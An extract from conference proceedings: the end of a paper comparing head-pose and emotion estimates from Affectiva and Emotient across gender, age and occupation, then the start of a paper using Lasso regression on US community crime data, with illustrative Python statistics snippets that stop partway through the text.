Is the Computation of Head Orientation Independent of the Facial Emotion Recognition Systems Used? There is a similarity in the variation of Euler angles in the videos of all our subjects; see, for example, the variation for two well-known politicians of the last 10 or so years, one in the United Kingdom and the other in the USA (Fig. 3). We take the highest evidence of anger (HEA) in both systems at the same timestamp and then note the variation of evidence around that time.
Fig. 3. Variation of anger intensity around HEA based on video of US politician (left) and UK (right)
We computed the correlation between the results for each of the angles produced by Affectiva and Emotient. Yaw and roll showed the highest correlation (87% and 82% respectively, p < 0.05); the lowest correlation was for pitch, at 69% (p < 0.05). The two systems thus show a degree of similarity in the computation of the three Euler angles. Figure 4 compares the variation in the Euler angles estimated by both systems for the same input video around the frame where the estimated anger intensity values are the highest. The blue trend line describes the variation of Euler angles with respect to media time in Emotient, while the orange trend line represents the variation of Euler angles with respect to media time in Affectiva. The blue vertical line marks the highest evidence of anger, where both systems had the highest anger intensity value.
Fig. 4. Distribution of Euler angles in both systems near the highest evidence of anger (vertical blue line), for the time course of anger: the blue trend line describes the variation of Euler angles with respect to media time in Emotient, while the orange trend line represents the variation of Euler angles with respect to media time in Affectiva
We tested this similarity by performing a rank correlation test on the time-aligned outputs of both systems. If one computes the head pose angle sum (PAS) as the sum of the absolute values of yaw, pitch and roll for any timestep, then one has a proxy measure of head orientation. It is possible to consider this measurement according to each of the systems plotted against each other (see Fig. 5): testing the correlation, Spearman's Rho is 0.62 (p < 2.2e−16); testing the difference with a directed, paired Wilcoxon test, one finds significantly greater values for Affectiva than for Emotient (V = 4.0994e+11, p < 2.2e−16). Considering the YPR vectors and their frame-by-frame differences for each system, Spearman's Rho is 0.33 (p < 2.2e−16). Thus, the values computed are not completely independent, but have significant differences as well. Table 5 presents the results of the analysis of correspondence and difference between Affectiva and Emotient in measuring each of yaw, pitch and roll, for both genders. The Spearman correlations each indicate significant positive correlations between the two systems (with coefficients between 0.67 and 0.89, p < 0.001), yet significant differences are also identified through the Kruskal tests (p < 0.001). The statistical test results were computed using Python libraries.
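The rank correlation used here can be sketched without external libraries as the Pearson correlation of the ranks, with tied values sharing their average rank. This is an illustrative sketch only: the function names and sample values are hypothetical, it returns just the coefficient (no p-value), and it is not the specific library routine the analysis relied on.

```python
import math


def average_ranks(values):
    """1-based ranks; tied values receive the mean of the ranks they occupy."""
    order = sorted(range(len(values)), key=lambda i: values[i])
    ranks = [0.0] * len(values)
    pos = 0
    while pos < len(order):
        end = pos
        while end + 1 < len(order) and values[order[end + 1]] == values[order[pos]]:
            end += 1
        shared = (pos + end) / 2 + 1  # mean of ranks pos+1 .. end+1
        for k in range(pos, end + 1):
            ranks[order[k]] = shared
        pos = end + 1
    return ranks


def spearman_rho(x, y):
    """Spearman's rho: Pearson correlation computed on the ranks."""
    rx, ry = average_ranks(x), average_ranks(y)
    n = len(rx)
    mean_x, mean_y = sum(rx) / n, sum(ry) / n
    sxy = sum((a - mean_x) * (b - mean_y) for a, b in zip(rx, ry))
    sxx = sum((a - mean_x) ** 2 for a in rx)
    syy = sum((b - mean_y) ** 2 for b in ry)
    return sxy / math.sqrt(sxx * syy)


# Illustrative PAS values only, one list per system.
pas_a = [17.0, 18.0, 4.0, 25.0, 9.0]
pas_b = [12.0, 11.0, 3.0, 14.0, 8.0]
print(spearman_rho(pas_a, pas_b))
```

Because only the ordering of the values matters, a high rho is compatible with one system reporting consistently larger values than the other, which is why the paired difference test is reported alongside the correlation.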
Fig. 5. Head pose angle sums, computed as the sum of absolute values of yaw, pitch and roll at each timestep, for both systems, Emotient (E) and Affectiva (A), are plotted against each other
Table 6 presents the results of analyzing the correspondence and difference between Affectiva and Emotient in measuring each of yaw, pitch and roll for each of the three occupations in the sample (CEO, Politician, Spokesperson). The systems demonstrate significant positive correlation (with Spearman coefficients between 0.54 and 0.89, p < 0.001) yet also significant differences (through Kruskal tests, p < 0.001).

Table 5. Relationships between Affectiva and Emotient values for yaw, pitch and roll, for females and males.
                      Yaw                  Pitch                Roll
                      Spearman  Kruskal    Spearman  Kruskal    Spearman  Kruskal
Female  Coefficient   0.89      180.9      0.71      34465      0.83      1569.2
        p-value       0.00      0.00       0.00      0.00       0.00      0.00
Male    Coefficient   0.87      2988.4     0.67      122116     0.83      6805.7
        p-value       0.00      0.00       0.00      0.00       0.00      0.00

Fig. 6. Change in yaw-pitch-roll vectors (see (4)), at each timestep, for both systems, Emotient (E) and Affectiva (A), plotted against each other

What Is the Relationship Between Head Orientation/Movement and Emotions in Spontaneous Videos? Table 7 presents the results of a regression analysis in which emotion is considered as a function of the Euler angles. This allows us to understand, for example, the effect of pitch (movement of the head on the vertical axis) in relation to a specific emotion (joy, for instance) and to compare with the results from the literature. In the table, c marks the estimated intercept and m the slope of the regression line (as in the standard form in (6)). The extremely low r² values indicate the poor fit of the corresponding linear models to the data.

$$y = c + mx + \epsilon \qquad (6)$$
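The quantities reported for each regression (intercept c, slope m and r²) can be obtained from an ordinary least-squares fit of the form in (6). The following is a minimal sketch with a hypothetical function name and invented sample values; it is not the authors' analysis code.

```python
def fit_line(x, y):
    """Ordinary least squares for y = c + m*x; returns (c, m, r_squared)."""
    n = len(x)
    mean_x, mean_y = sum(x) / n, sum(y) / n
    sxx = sum((a - mean_x) ** 2 for a in x)
    sxy = sum((a - mean_x) * (b - mean_y) for a, b in zip(x, y))
    m = sxy / sxx
    c = mean_y - m * mean_x
    # r-squared: share of the variance in y explained by the fitted line.
    ss_res = sum((b - (c + m * a)) ** 2 for a, b in zip(x, y))
    ss_tot = sum((b - mean_y) ** 2 for b in y)
    return c, m, 1.0 - ss_res / ss_tot


# Illustrative values only: pitch in degrees and emotion evidence per frame.
pitch = [-8.0, -3.0, 0.0, 4.0, 9.0]
joy_evidence = [0.30, 0.10, 0.25, 0.15, 0.35]
c, m, r2 = fit_line(pitch, joy_evidence)
print(c, m, r2)
```

An r² near zero, as in this invented example, means the angle explains almost none of the variation in the emotion evidence, even when the fitted slope is non-zero.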
Within the two systems, emotion labels are derived values, based on values for head and facial action movements in posed data sets, where the emotion labels were assigned on the basis of the assumption that actors performed emotions as directed, and were able to perform those emotions authentically.3 Thus, even for the training data, head orientation will have supplied only part of the information used to infer the given label. This is shown in the mean value of head pose angle sums varying with emotion label, for both of the systems, and for the emotion labels supplied by each system. The PAS values within each emotion are greater as measured by Affectiva for Affectiva’s most likely emotion label than as measured by Emotient for Emotient’s most likely emotion label (Wilcox V = 21, p = 0.01563). For both Affectiva (Kruskal-Wallis χ2 = 133523, df = 5, p < 2.2e − 16) and Emotient (Kruskal-Wallis χ2 = 4078, df = 5, p < 2.2e − 16) there are significant differences in the PAS values as a function of the mostprobable emotion (See Table 8).
3 It is reasonable to suppose that performed emotions are exaggerated, even for “method” actors.
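The Kruskal-Wallis statistics quoted above compare the rank distributions of a measure across emotion groups. As a hedged illustration only (the function name `kruskal_wallis_h` and the toy groups are assumptions, and the p-value, which comes from a chi-square distribution with k − 1 degrees of freedom, is omitted to keep the sketch within the standard library), the H statistic with tie correction can be computed as follows.

```python
from itertools import groupby

def kruskal_wallis_h(*groups):
    """Kruskal-Wallis H statistic with tie correction (average ranks).

    Undefined (division by zero) if every pooled value is identical.
    """
    # Pool all observations, remembering which group each came from.
    pooled = sorted((v, g) for g, values in enumerate(groups) for v in values)
    n_total = len(pooled)
    rank_sums = [0.0] * len(groups)
    tie_term = 0.0
    position = 0
    for _, run in groupby(pooled, key=lambda pair: pair[0]):
        run = list(run)
        t = len(run)
        avg_rank = position + (t + 1) / 2.0  # mean of ranks position+1 .. position+t
        for _, g in run:
            rank_sums[g] += avg_rank
        tie_term += t ** 3 - t
        position += t
    h = 12.0 / (n_total * (n_total + 1)) * sum(
        rs ** 2 / len(values) for rs, values in zip(rank_sums, groups)
    ) - 3.0 * (n_total + 1)
    correction = 1.0 - tie_term / (n_total ** 3 - n_total)
    return h / correction

# Toy PAS-like values for three hypothetical emotion groups.
h = kruskal_wallis_h([1, 2, 3], [4, 5, 6], [7, 8, 9])
print(round(h, 3))
```

A large H relative to the chi-square reference distribution indicates that at least one group's values tend to rank higher or lower than the others.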
Table 6. Relationships between Affectiva and Emotient values for yaw, pitch and roll, by occupation

                           Yaw                  Pitch                Roll
                           Spearman  Kruskal    Spearman  Kruskal    Spearman  Kruskal
CEO           Coefficient  0.89      4963       0.54      23687      0.86      127.73
              p-value      0.00      0.00       0.00      0.00       0.00      0.00
Politician    Coefficient  0.87      1338       0.67      92196      0.83      6982
              p-value      0.00      0.00       0.00      0.00       0.00      0.00
Spokesperson  Coefficient  0.89      7013       0.78      34270      0.82      3012
              p-value      0.00      0.00       0.00      0.00       0.00      0.00
Table 7. Regression analysis: “Emotion” evidence as a function of Euler angles

                   Emotient                      Affectiva
                   Yaw       Pitch     Roll      Yaw      Pitch    Roll
Anger  c           0.1303    0.1339    0.1248    5.8073   5.7087   5.7847
       m           0.0004    −0.0033   0.0073    0.0237   0.0133   0.1330
       r-squared   0.000     0.007     0.026     0.0000   0.0000   0.002
Joy    c           0.2273    0.2176    0.2362    2.6300   2.1704   2.5911
       m           −0.0009   0.0090    −0.0119   0.0364   0.0757   −0.0587
       r-squared   0.001     0.0220    0.029     0.001    0.002    0.001
Table 8. Mean of head pose angle sum for each system, by most likely emotion, according to each label source

System     Label Source  Anger   Contempt  Disgust  Fear    Joy     Sadness  Surprise
Affectiva  Affectiva     33.510  29.463    23.165   18.127  22.441  21.291   21.807
Affectiva  Emotient      26.332  28.211    24.100   21.306  25.068  25.283   24.460
Emotient   Affectiva     18.327  17.099    16.341   14.126  15.006  14.508   15.554
Emotient   Emotient      16.363  17.778    16.482   15.127  15.814  16.766   16.463
Similarly, in relation to change in each angle (yaw, pitch and roll) from one timestep to the next, one may examine the total magnitude of change (the sum of absolute values of change at each timestep; recall (2)) across the three angles as measured by each of the systems (see Table 9). For both Affectiva (Kruskal-Wallis χ2 = 1779.9, df = 6, p < 2.2e−16) and Emotient (Kruskal-Wallis χ2 = 5035.5, df = 6, p < 2.2e−16) there are significant differences in this aggregated measure of angular movement depending on the emotion category determined most likely by the corresponding system.
Table 9. Mean of head pose angle change magnitudes (at each timestep, the sum of absolute values of change in yaw, pitch and roll; therefore, the mean of that aggregate angle change magnitude) in relation to each emotion label deemed most probable for each system

System     Anger  Contempt  Disgust  Fear   Joy    Sadness  Surprise
Affectiva  0.098  0.103     0.087    0.082  0.084  0.092    0.084
Emotient   0.048  0.043     0.045    0.042  0.043  0.048    0.052
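The aggregate behind Table 9 can be sketched as below, assuming (as the text describes) that the per-timestep magnitude is the sum of absolute changes in yaw, pitch and roll between consecutive frames. The function name `angle_change_magnitudes` and the three sample frames are hypothetical.

```python
def angle_change_magnitudes(frames):
    """frames: list of (yaw, pitch, roll) tuples, one per timestep.

    Returns, for each pair of consecutive frames, the sum of the
    absolute changes in the three angles.
    """
    return [
        sum(abs(b - a) for a, b in zip(prev, curr))
        for prev, curr in zip(frames, frames[1:])
    ]

# Three made-up frames of (yaw, pitch, roll) in degrees.
frames = [(0.0, 0.0, 0.0), (1.0, -2.0, 0.5), (1.5, -2.0, 0.0)]
magnitudes = angle_change_magnitudes(frames)
mean_magnitude = sum(magnitudes) / len(magnitudes)
print(magnitudes, mean_magnitude)
```

Grouping these per-timestep magnitudes by the most probable emotion label and averaging within each group would give one row of a table shaped like Table 9.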
Table 10 indicates the mean values of change in position between successive frames (the complement of cosine similarity as in (4)) for the most probable emotion according to each system. Figure 6 depicts the change in YPR values derived from Emotient measurements plotted against the change in YPR values derived from Affectiva measurements. For both Affectiva (Kruskal-Wallis χ2 = 3473.3, df = 6, p < 2.2e−16) and Emotient (Kruskal-Wallis χ2 = 6223.8, df = 6, p < 2.2e−16), there are significant differences in the YPR.df values according to the most probable emotion selected by each system.

Table 10. Means of change in YPR vectors over successive frames, according to the most probable emotion for each system

System     Anger    Contempt  Disgust  Fear     Joy      Sadness  Surprise
Affectiva  0.00043  0.00042   0.00023  0.00017  0.00021  0.00021  0.00019
Emotient   0.00042  0.00039   0.00032  0.00028  0.00032  0.00046  0.00050
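The YPR.df measure is described as the complement of cosine similarity between the yaw-pitch-roll vectors of successive frames. A minimal sketch under that reading follows; the names `cosine_distance` and `ypr_changes` are illustrative, and the handling of zero vectors (not covered here) is left open.

```python
import math

def cosine_distance(u, v):
    """1 - cosine similarity of two equal-length vectors (undefined for zero vectors)."""
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
    return 1.0 - dot / (norm_u * norm_v)

def ypr_changes(frames):
    """Cosine distance between each frame's (yaw, pitch, roll) and the next one's."""
    return [cosine_distance(p, c) for p, c in zip(frames, frames[1:])]

# Made-up frames: a small change in direction, then a pure change in magnitude.
frames = [(10.0, 5.0, 1.0), (10.5, 5.0, 1.0), (21.0, 10.0, 2.0)]
print(ypr_changes(frames))
```

Because the measure depends only on direction, doubling all three angles (second to third frame) yields a change of approximately zero, which helps explain why the values in Table 10 are so small.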
Thus, there is evidence that both head pose and motion vary with the most likely emotion label accorded to each timestep, for both of the systems considered, even though the systems differ with respect to which emotion labels are implicated. Is the Relationship Between Head Orientation and Emotions Independent of the Gender and Age of the Videoed Person? There appear to be significant interactions among most likely emotion label, gender and age for each of the systems on the corresponding posed angle sum (PAS) values. Using the PAS measure as a response value and a linear model that predicts this on the basis of assigned emotion, gender and age, for Emotient, the corresponding linear model has an adjusted R-squared value of 0.1151 (F-statistic: 4616 on 27 and 958212 DF, p < 2.2e − 16) and all interactions are significant (p < 0.001). The matched linear model that predicts PAS for Affectiva assuming interactions of Affectiva-assigned emotion labels, gender and age has an adjusted R-squared value of 0.1907 (F-statistic: 8366 on 27 and 958212 DF, p < 2.2e−16) and reveals all interactions to be significant (p < 0.001). From the adjusted R-squared values, it seems safe to conclude that both models omit important factors that
explain the variation in PAS values; nonetheless, they both reveal significant interactions of gender and age on the projected emotion. Modelling YPR.df values, the frame-by-frame change in yaw-pitch-roll vectors, similarly produces significant interactions among gender, system-calculated emotion and age, for each system, but with much lower R-squared values. The interaction effects are all significant (p < 0.001). For Emotient, adjusted R2 is 0.002957 (F-statistic: 106.3 on 27 and 958211 DF, p < 2.2e−16); for Affectiva, adjusted R2 is 0.005431 (F-statistic: 194.8 on 27 and 958211 DF, p < 2.2e−16). More so than for the PAS models, the linear models predicting YPR.df lack explanatory variables.4 Figure 7 illustrates the nature of these interactions: for Affectiva, females in the dataset studied have pose angle magnitude sums that are greater than or equal to those of males for each emotion label except joy, fear and surprise; for Emotient, females have PAS values greater than or equal to those of males for all emotion labels except surprise. Table 11 presents the mean PAS values underlying these interaction plots. Thus, Affectiva and Emotient both reach qualitatively different judgements between genders for measurements of the confluence of angular position and surprise.

Table 11. Means of posed angle sums for each system and its most probable emotion calculation, for each gender

System     Gender  Anger   Contempt  Disgust  Fear    Joy     Sadness  Surprise
Affectiva  Female  38.168  32.579    23.830   15.521  20.458  21.724   20.957
Affectiva  Male    31.781  27.737    22.878   24.792  25.039  21.128   22.758
Emotient   Female  19.461  18.899    17.256   15.293  17.305  17.816   15.981
Emotient   Male    15.979  17.106    16.339   14.939  14.191  15.269   17.127
Figure 8 and Table 12 present the interaction between gender and system-calculated most probable emotion on the change in YPR vectors.

Table 12. Means of change in YPR vectors for each system and its most probable emotion calculation, for each gender

System     Gender  Anger    Contempt  Disgust  Fear     Joy      Sadness  Surprise
Affectiva  Female  0.00074  0.00039   0.00021  0.00015  0.00019  0.00014  0.00018
Affectiva  Male    0.00031  0.00044   0.00024  0.00023  0.00024  0.00023  0.00019
Emotient   Female  0.00082  0.00050   0.00058  0.00030  0.00038  0.00054  0.00058
Emotient   Male    0.00037  0.00031   0.00027  0.00027  0.00025  0.00034  0.00039

4 Our task here is not to identify complete theories of variation in PAS or YPR.df, but rather to assess the interaction of particular factors on head position and motion.
[Figure: two interaction plots. x-axis: Gender (FEMALE, MALE); y-axis: mean of A.Pose.Angle.Sum (left panel) and mean of E.Pose.Angle.Sum (right panel); one line per most probable emotion (probable_emotion_y and probable_emotion_x).]

Fig. 7. Interaction between system-assigned probable emotions and gender on pose angle magnitude sums. On the left, the values for Affectiva are shown (y = Affectiva) and on the right, values for Emotient are shown (x = Emotient).
[Figure: two interaction plots. x-axis: Gender (FEMALE, MALE); y-axis: mean of A.YPR.df (left panel) and mean of E.YPR.df (right panel); one line per most probable emotion (probable_emotion_y and probable_emotion_x).]

Fig. 8. Interaction between system-assigned probable emotions and gender on change in YPR vectors. On the left, the values for Affectiva are shown (y = Affectiva) and on the right, values for Emotient are shown (x = Emotient).
For Affectiva, males show greater change in position vectors for all emotions but anger, while for Emotient, females show greater change in position vectors for all emotions. Turning to age, there is a small (but significant) negative Spearman correlation between age and posed angle sum for Affectiva (ρ = −0.16483049; p < 2.2e−16), and a small negative Spearman correlation of greater magnitude between age and posed angle sum for Emotient (ρ = −0.2899963; p < 2.2e−16). Table 13 shows the mean values of PAS for each system according to ordinal age categories derived from quartiles of age values.
Table 13. Means of posed angle sums for each system, according to ordinal age categories derived from age quartiles

System     [28, 50]  (50, 61]  (61, 68]  (68, 91]
Affectiva  24.449    30.573    25.829    18.780
Emotient   18.184    17.683    16.239    12.634
These observations support the generalization that age is accompanied by smaller angles in head position, or more colloquially: with age, extreme poses are less likely.5 Table 14 shows the means of YPR.df values by age group. Both systems identify least movement for the greatest age category.

Table 14. Means of YPR.df for each system, according to ordinal age categories derived from age quartiles

System     [28, 50]  (50, 61]  (61, 68]  (68, 91]
Affectiva  0.00022   0.00034   0.00031   0.00017
Emotient   0.00030   0.00043   0.00046   0.00025

5 Conclusions
We have demonstrated that although differences in critical measures constructed by Affectiva and Emotient are significant, within each, comparable patterns of interaction are visible in the judgments of emotion and aggregated quantities associated with head position and change in head position. The greatest agreement between systems on the interaction of gender and angular position (using the posed angle sum aggregation) with emotion labels is for the emotion surprise, where for both systems females have smaller angular magnitude summation values than males, against a contrasting trend of females having larger angular magnitude summation values than males for other emotion labels. It has been demonstrated that the two systems lead to different judgments of effects on the measurements made, depending on the measurement examined (e.g. posed angle sum vs YPR.df). The systems also differ in their calculation of probable emotions, but using each system’s own determination of the likely emotion, the effects on measures of head position and movement vary.

5 An alternative generalization is that with age, politicians, CEOs and spokespeople are more likely to focus more directly on the camera recording the utterances. Here, and independently of the age variable, data recording whether teleprompters were activated or not would be useful, inasmuch as gazing at a teleprompter to access speech content would thwart wide angular positions. Implicit here is an assumption that for all of the recordings, a single “face-on” camera was available and provided a primary focal point for the speaker. For speeches recorded with multiple-camera arrangements, it is natural that from the perspective of the video stream available, attention to other cameras would appear as angled positions.
Acknowledgments. We are grateful to the GEstures and Head Movement (GEHM) research network (Independent Research Fund Denmark grant 9055-00004B). We thank Subishi Chemmarathil for helpful efforts in data collection and curation.
References
1. Ahmad, K., Wang, S., Vogel, C., Jain, P., O’Neill, O., Sufi, B.H.: Comparing the Performance of Facial Emotion Recognition Systems on Real-Life Videos: Gender, Ethnicity and Age. In: Arai, K. (ed.) FTC 2021. LNNS, vol. 358, pp. 193–210. Springer, Cham (2022). https://doi.org/10.1007/978-3-030-89906-6_14
2. Ahmed, F., Bari, A.S.M.H., Gavrilova, M.L.: Emotion recognition from body movement. IEEE Access 8, 11761–11781 (2019)
3. Bartlett, M.S., Littlewort-Ford, G., Movellan, J., Fasel, I., Frank, M.: Automated facial action coding system, 27 December 2016. US Patent 9,530,048
4. Ekman, P., et al.: Universals and cultural differences in the judgments of facial expressions of emotion. J. Pers. Soc. Psychol. 53(4), 712 (1987)
5. Ekman, P., Oster, H.: Facial expressions of emotion. Annu. Rev. Psychol. 30(1), 527–554 (1979)
6. El Kaliouby, R.: Mind-reading machines: automated inference of complex mental states. Ph.D. thesis, The Computer Laboratory, University of Cambridge, 2005. Technical Report no. UCAM-CL-TR-636 (2005)
7. Johnson, D.O., Cuijpers, R.H.: Investigating the effect of a humanoid robot’s head position on imitating human emotions. Int. J. Soc. Robot. 11(1), 65–74 (2019)
8. Keltner, D., Sauter, D., Tracy, J., Cowen, A.: Emotional expression: advances in basic emotion theory. J. Nonverbal Behav. 43(2), 133–160 (2019)
9. Koppensteiner, M., Grammer, K.: Motion patterns in political speech and their influence on personality ratings. J. Res. Pers. 44(3), 374–379 (2010)
10. Littlewort, G., et al.: The computer expression recognition toolbox (CERT). In: 2011 IEEE International Conference on Automatic Face & Gesture Recognition (FG), pp. 298–305. IEEE (2011)
11. McDuff, D., Mahmoud, A., Mavadati, M., Amr, M., Turcot, J., Kaliouby, R.: AFFDEX SDK: a cross-platform real-time multi-face expression recognition toolkit. In: Proceedings of the 2016 CHI Conference Extended Abstracts on Human Factors in Computing Systems, pp. 3723–3726 (2016)
12. Toscano, H., Schubert, T.W., Giessner, S.R.: Eye gaze and head posture jointly influence judgments of dominance, physical strength, and anger. J. Nonverbal Behav. 42(3), 285–309 (2018)
13. Wallbott, H.G.: Bodily expression of emotion. Eur. J. Soc. Psychol. 28(6), 879–896 (1998)
14. Werner, P., Al-Hamadi, A., Limbrecht-Ecklundt, K., Walter, S., Traue, H.C.: Head movements and postures as pain behavior. PLoS ONE 13(2), e0192767 (2018)
15. Zhang, X., et al.: Bp4d-spontaneous: a high-resolution spontaneous 3d dynamic facial expression database. Image Vis. Comput. 32(10), 692–706 (2014)
Using Machine Learning to Identify Top Antecedents Affecting Crime in US Communities
Kamil Samara
University of Wisconsin-Parkside, Kenosha, USA
Abstract. Criminal activity has always been one of the main concerns for countries. In recent years, with the development of data collection and analysis techniques, a massive number of data-related studies have been performed to analyze crime data. Studying indirect features is an important yet challenging task. In this work we use machine learning (ML) techniques to try to identify the top variables affecting crime rates in different US communities. The data used in this work was collected from the Bureau of the Census and the Bureau of Justice Statistics. Out of the 125 variables collected in this data, we try to identify the top factors that correlate with higher crime rates, either positively or negatively. The analysis in this paper was done using the Lasso regression technique provided in the Python library Scikit-learn.

Keywords: Machine learning · Lasso regression · Crime
1 Introduction

Crime, as a socioeconomic complication, has shown multifaceted associations with socioeconomic and environmental aspects. Recognizing patterns and connections between crime and these factors is vital to understanding the root causes of criminal activities. By detecting the root causes, legislators can implement solutions for them, eventually avoiding most sources of crime [1].

In the age of information technology, crime statistics are recorded in databases for study and analysis. Manual analysis is impractical due to the vast size of the stored data. The suitable solution here is to use data science and machine learning techniques to analyse the data. Using the descriptive and predictive powers of those techniques, officials will be able to minimize crime, and the same powers can support long-term crime prevention solutions.

This predictive analysis could be done on two levels. The first is predicting when and where crimes will happen. This type of prediction is hard to implement because predictions are highly sensitive to the complex distribution of crimes in time and space. The second is focusing predictions on identifying the correlations of crimes with socioeconomic and environmental aspects [2].

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 96–101, 2023. https://doi.org/10.1007/978-3-031-28073-3_7
Lately, machine learning methods have grown in popularity. Among the most popular approaches are Bayesian models, random forests, K-Nearest Neighbors (KNN), neural networks, and support vector machines (SVM) [3]. As a step toward crime prediction using machine learning techniques, the work proposed in this paper uses the Lasso regression technique to predict the top socioeconomic and environmental factors related to crime rates in US cities. The study was performed using data collected from the Bureau of the Census and the Bureau of Justice Statistics. The remainder of the paper is organized as follows: Sect. 2 covers related work, Sect. 3 presents the work done in this study, and Sect. 4 concludes the work.
2 Related Work

Crime is a global problem, which has motivated many researchers to apply machine learning techniques to perform predictive analytics in an effort to detect crime factors. The studies range in complexity depending on the volume of the datasets used and the number of variables collected.

A common form of crime prediction analysis focuses on temporal data. A common reason behind this emphasis is that crime data sets contain data collected over many years. An example of such analysis is the work of Linning [4], who studied the variation of crime throughout the year to predict a pattern over seasons. The main observation was that crime peaks in the hot summer season compared with the cold winter season. In a similar study [5], the authors examined the crime data of two major US cities and compared the statistical investigation of the crimes in these cities. The main goal of the study was to use agent-based crime environment simulation to identify crime hotspots.

In [6], Nguyen and his team used data from the Portland Police Bureau (PPB), augmented with census data from other public sources, to predict crime category in the city of Portland using Support Vector Machine (SVM), Random Forest, Gradient Boosting Machines, and Neural Networks. A unique approach that classifies crime from crime reports into many categories using textual analysis and classification was presented in [7]. The authors used five classification methods and concluded that Support Vector Machines (SVM) performed better than the other methods. The researchers in [8] used data extracted from neighborhoodscout.com and the University of California-Irvine, in the state of Mississippi, to predict crime patterns using additive linear regression.

Graph-based techniques were used in [9] to mine datasets for correlation. The objective was to identify top and bottom correlative crime patterns. In their final remarks, the authors conclude that the approach successfully discovers both positive and negative correlative relations among crime events and spatial factors and is computationally efficient.
3 Proposed Work

The scope of this work is to analyze crime data in an effort to recognize the top factors affecting crime plausibility. The features considered in this work are socio-economic factors such as race, number of people living in the same house, and mean household income. Python was the programming language of choice in this work. To perform the regression, the Lasso model in the Scikit-learn library was used. Scikit-learn is a free machine learning library for the Python programming language.

3.1 Dataset

The dataset used in this paper is the “Communities and Crime Unnormalized Data Set” available at the University of California Irvine (UCI) Machine Learning Repository. This data set focuses on communities in the United States and was combined from the following sources: the 1995 US FBI Uniform Crime Report, the 1990 United States Census, and the 1990 United States LEMAS (Law Enforcement Management and Administrative) Statistics Survey. The data set was donated to the UCI Machine Learning Repository in July 2009 [10].

The data set includes 2215 examples and 125 features for different communities across all states. The features blend data from diverse sources of crime-related information, ranging from the number of vacant households to city density and the percentage of people who are foreign born, to average household income. Also included are measures of crimes considered violent, which are murder, rape, robbery, and assault. Only features that had a plausible connection to crime were included; unrelated features were left out [10].

3.2 Lasso Regression

Lasso (Least Absolute Shrinkage and Selection Operator) regression is a member of the linear regression family that uses shrinkage. Shrinkage is where estimates are contracted toward a central value, such as the mean; in Lasso, the coefficient estimates are shrunk toward zero. The lasso technique promotes models with fewer parameters. Lasso regression is well suited to models exhibiting high levels of multicollinearity [11].
Lasso regression performs L1 regularization. As shown in Eq. 1, L1 regularization works by adding a penalty proportional to the sum of the absolute values of the coefficients. L1 regularization encourages models with few coefficients: some coefficients are reduced to exactly zero and are thereby removed from the model. L1 regularization helps produce simpler models, since larger penalties drive more coefficient values to zero. On the other hand, Ridge regression (i.e., L2 regularization) does not result in the removal of coefficients or in sparse models. This makes models with L1 regularization far easier to interpret than models with L2 regularization [11].

$$\mathrm{RSS}_{\mathrm{LASSO}}(w, b) = \sum_{i=1}^{N} \bigl(y_i - (w \cdot x_i + b)\bigr)^2 + \alpha \sum_{j=1}^{p} |w_j| \qquad (1)$$

where:
y_i: target value
w · x_i + b: predicted value
α: controls the amount of L1 regularization (default = 1.0)

3.3 Feature Normalization

Before applying Lasso regression to the dataset, MinMax scaling of the features was performed. It is crucial in several machine learning techniques that all features are on the same scale (e.g. for faster convergence in learning and a more uniform or ‘fair’ influence for all weights) [12]. For each feature x_i, compute the minimum value x_i^MIN and the maximum value x_i^MAX achieved across all instances in the training set. Then transform a given value of feature x_i to a scaled version x_i' using

$$x_i' = \frac{x_i - x_i^{MIN}}{x_i^{MAX} - x_i^{MIN}} \qquad (2)$$
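A minimal sketch of Eq. 2 follows, with the minimum and maximum learned from the training rows only and then reused for other rows. The helper names `fit_min_max` and `apply_min_max` and the sample values are assumptions for illustration; the study itself reports using MinMax scaling without giving code.

```python
def fit_min_max(train_rows):
    """Return per-feature minimums and maximums computed on the training set."""
    columns = list(zip(*train_rows))
    return [min(col) for col in columns], [max(col) for col in columns]

def apply_min_max(rows, mins, maxs):
    """Scale each feature with Eq. 2; constant features map to 0.0."""
    return [
        [(x - lo) / (hi - lo) if hi > lo else 0.0
         for x, lo, hi in zip(row, mins, maxs)]
        for row in rows
    ]

# Two made-up features on very different scales.
train = [[1.0, 10.0], [3.0, 30.0], [5.0, 20.0]]
mins, maxs = fit_min_max(train)
scaled_train = apply_min_max(train, mins, maxs)

# Unseen rows reuse the training minimum and maximum, so values can fall outside [0, 1].
scaled_new = apply_min_max([[2.0, 40.0]], mins, maxs)
print(scaled_train, scaled_new)
```

Fitting the scaler on the training set alone avoids leaking information from held-out data into the model.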
3.4 Alpha Value Selection

The parameter α controls the amount of L1 regularization applied in Lasso linear regression. The default value of alpha is 1.0. To use Lasso regression effectively, an appropriate value of alpha must be selected. To decide on that value, a range of alpha values was compared using the r-squared value. R-squared (R2) is a statistical measure of the proportion of the variance of the dependent variable that is explained by the independent variable or variables in a regression model [12]. The alpha values used in the comparison were: [0.5, 1, 2, 3, 5, 10, 20, 50]. The results of the comparison are shown in Table 1. As Table 1 shows, the highest r-squared value was achieved at an alpha value of 2.

Table 1. Effect of alpha regularization

Alpha value  Features kept  R-squared value
0.5          35             0.58
1            25             0.60
2            20             0.63
3            17             0.62
5            12             0.61
10           6              0.58
20           2              0.50
50           1              0.30
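The comparison in Table 1 can be sketched as a loop over candidate alpha values that records how many weights stay non-zero and the resulting R-squared. The study used Scikit-learn's Lasso model; the block below is instead a small pure-Python coordinate-descent stand-in that minimizes the objective exactly as written in Eq. 1, so its alpha values are not numerically comparable to Scikit-learn's, which scales the squared-error term by 1/(2N). The toy data, the function names, and the choice to score on the training data are all assumptions.

```python
def soft_threshold(rho, lam):
    """Shrink rho toward zero by lam; values within [-lam, lam] become 0."""
    if rho > lam:
        return rho - lam
    if rho < -lam:
        return rho + lam
    return 0.0

def predict(w, b, row):
    return b + sum(wj * xj for wj, xj in zip(w, row))

def fit_lasso(X, y, alpha, n_iter=200):
    """Coordinate descent on sum_i (y_i - (w.x_i + b))^2 + alpha * sum_j |w_j|."""
    n, p = len(X), len(X[0])
    w, b = [0.0] * p, sum(y) / n
    for _ in range(n_iter):
        for j in range(p):
            rho = z = 0.0
            for row, target in zip(X, y):
                # Residual of the model with feature j left out.
                partial = target - (predict(w, b, row) - w[j] * row[j])
                rho += row[j] * partial
                z += row[j] ** 2
            w[j] = soft_threshold(rho, alpha / 2.0) / z if z > 0 else 0.0
        # The intercept is not penalized: set it to the mean remaining residual.
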